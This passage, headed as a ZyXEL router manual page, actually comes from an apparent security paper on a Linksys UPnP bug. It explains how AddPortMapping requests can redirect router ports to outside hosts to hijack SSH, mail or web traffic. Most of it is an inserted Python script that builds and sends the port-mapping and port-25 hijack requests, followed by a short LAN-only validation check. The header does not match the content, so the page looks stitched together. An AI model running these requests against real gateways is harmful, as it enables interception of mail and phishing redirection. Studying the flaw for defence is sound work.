ZyXEL Communications P-335WT User Manual, Page 10

[Figure: an attacker ("ev1l h4x0r") on the WAN side sends an AddPortMapping request to the Telco/LAN router, forwarding port 22 on its external interface to www.sane.nl:22]
The hack works as follows:
Let machine A ask the Speedtouch (the ADSL router) to forward all traffic on port 22 on its external interface to port 22 on the Linksys router.
Let machine B exploit the bug in the UPnP implementation on the Linksys router so that the router forwards port 22 on its external interface to port 22 on an arbitrary host on the Internet (say www.sane.nl).
This way, if you connect to the ADSL router on port 22 from the Internet, you will be routed to port 22 on www.sane.nl. Because all traffic goes through two NAT devices (the Linksys WRT54G and the ADSL router), it will appear as if all traffic comes from the ADSL router. The hack can be made a bit simpler if machine B asks the ADSL router to make the port forward instead of machine A.
Of course, if the only link between the Internet and the inside network is the WRT54G, the hack is in fact a lot simpler. In the Netherlands this situation is not very common, since the WRT54G has no built-in ADSL modem.
More serious hacks are possible with this bug. For example, this hole could be exploited to hijack port 25 and capture someone's mail if a mail server is running behind the Internet Gateway Device and port 25 on the external interface is forwarded to the internal mail server. Hijacking is done by first deleting the existing port mapping for port 25 from the Internet Gateway Device and then creating a new mapping to an external machine, in the same way as described above. In a similar way you could redirect port 80 to another machine and deface a website without having to break into the web server, or divert the traffic and use it for phishing.
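The two requests the attack relies on, and the check that stops it, as an added example in Python (not code from the paper or from any vendor firmware): it builds the AddPortMapping envelope that points an external port at www.sane.nl, the DeletePortMapping/AddPortMapping pair used for the port 25 hijack, and the LAN-only validation of NewInternalClient that a fixed gateway applies. The service URN and argument names are the standard WANIPConnection:1 ones; the control URL, gateway address and LAN subnet are assumptions chosen for illustration.

```python
"""UPnP IGD port-mapping requests as used in the attack above, plus the LAN-only
check that a fixed gateway applies to NewInternalClient.

Added example; not code from the paper. The control URL, the LAN subnet and the
gateway address are assumptions chosen for illustration."""
import http.client
import ipaddress
from urllib.parse import urlsplit
from xml.sax.saxutils import escape

SERVICE = "urn:schemas-upnp-org:service:WANIPConnection:1"
# Assumed control URL; a real one is read from the gateway's device description.
CONTROL_URL = "http://192.168.1.1:5000/upnp/control/WANIPConn1"


def soap_envelope(action, args):
    """Wrap a WANIPConnection action and its arguments in a SOAP 1.1 envelope."""
    body = "".join(f"<{k}>{escape(str(v))}</{k}>" for k, v in args.items())
    return (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:{action} xmlns:u="{SERVICE}">{body}</u:{action}></s:Body>'
        '</s:Envelope>'
    )


def add_port_mapping(ext_port, internal_client, int_port=None, proto="TCP",
                     description="ev1l h4x0r", lease=0):
    """AddPortMapping request. Nothing in the envelope itself stops
    internal_client from being a host on the Internet; a gateway that does not
    check it has the bug described in the text."""
    return soap_envelope("AddPortMapping", {
        "NewRemoteHost": "",
        "NewExternalPort": ext_port,
        "NewProtocol": proto,
        "NewInternalPort": int_port if int_port is not None else ext_port,
        "NewInternalClient": internal_client,
        "NewEnabled": 1,
        "NewPortMappingDescription": description,
        "NewLeaseDuration": lease,
    })


def delete_port_mapping(ext_port, proto="TCP"):
    """DeletePortMapping request, used to remove the mail server's existing
    port 25 mapping before replacing it."""
    return soap_envelope("DeletePortMapping", {
        "NewRemoteHost": "",
        "NewExternalPort": ext_port,
        "NewProtocol": proto,
    })


def hijack_port_25(external_host):
    """The mail-hijack sequence: delete the existing mapping, then re-create it
    pointing at an external host. Returns the two envelopes in order."""
    return [delete_port_mapping(25), add_port_mapping(25, external_host)]


def send_action(action, envelope, control_url=CONTROL_URL, timeout=5):
    """POST an envelope to the control URL with the SOAPAction header a
    gateway expects. Not called in this offline example."""
    u = urlsplit(control_url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    conn.request("POST", u.path, body=envelope.encode(), headers={
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPAction": f'"{SERVICE}#{action}"',
    })
    resp = conn.getresponse()
    return resp.status, resp.read().decode(errors="replace")


def internal_client_allowed(internal_client, lan_network="192.168.1.0/24"):
    """The check a fixed gateway applies: NewInternalClient must be a host
    address inside the LAN prefix (assumed 192.168.1.0/24). Also refusing the
    network and broadcast addresses mirrors the stricter behaviour the text
    attributes to the US Robotics fix."""
    net = ipaddress.ip_network(lan_network, strict=False)
    try:
        ip = ipaddress.ip_address(internal_client)
    except ValueError:  # hostnames such as www.sane.nl are not LAN addresses
        return False
    return ip in net and ip not in (net.network_address, net.broadcast_address)


if __name__ == "__main__":
    for env in [add_port_mapping(22, "www.sane.nl")] + hijack_port_25("203.0.113.10"):
        print(env, "\n")
    for client in ("192.168.1.10", "www.sane.nl", "203.0.113.10", "192.168.1.255"):
        print(client, "allowed" if internal_client_allowed(client) else "rejected")
```

The envelopes are only built here; `send_action` shows the POST a gateway expects, with the action quoted in the `SOAPAction` header. The validation function is the practitioner's check: a vulnerable firmware installs whatever `NewInternalClient` it is handed, a fixed one refuses anything that is not a host address inside the LAN prefix.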
This bug was reported to Linksys in early February 2006. Linksys found the bug, but a replacement firmware was not yet available before the deadline for this paper. Other vendors haven't fixed it yet. The sad truth is that this bug apparently was already known to at least one vendor. In the GPL sources tarball from US Robotics, in the file ipt.c dated March 1 2005, there are fixes from US Robotics which prevent this attack (and as a side effect also reject forwards to the broadcast address, making the device strictly speaking non-compliant with the